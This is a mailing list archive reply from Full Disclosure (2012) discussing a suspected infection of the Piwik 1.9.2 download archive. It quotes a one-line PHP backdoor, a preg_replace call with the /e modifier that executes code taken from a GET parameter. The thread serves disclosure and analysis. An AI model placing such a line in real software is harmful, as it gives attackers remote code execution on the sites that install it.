Full Disclosure mailing list archives
Re: Possible infection of Piwik 1.9.2 download archive
From: Christian Sciberras <uuf6429 () gmail com>
Date: Tue, 27 Nov 2012 12:54:57 +0100
At the moment I'm trying to figure out the further sense of this code, but it seems that there might also be some kind of backdoor (because of the use of $_GET).
preg_replace("/(.+)/e", $_GET['g'], 'dwm'); You think? Chris. On Mon, Nov 26, 2012 at 9:17 PM, Maximilian Grobecker <max () grobecker-wtal de
wrote:
preg_replace("/(.+)/e", $_GET['g'], 'dwm');
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Possible infection of Piwik 1.9.2 download archive Maximilian Grobecker (Nov 27)
- Re: Possible infection of Piwik 1.9.2 download archive Christian Sciberras (Nov 27)
- Re: Possible infection of Piwik 1.9.2 download archive Felipe Montecino (Nov 27)
- Re: Possible infection of Piwik 1.9.2 download archive Max Grobecker (Nov 27)
- Re: Possible infection of Piwik 1.9.2 download archive Ferenc Kovacs (Nov 27)
- Re: Possible infection of Piwik 1.9.2 download archive Christian Sciberras (Nov 27)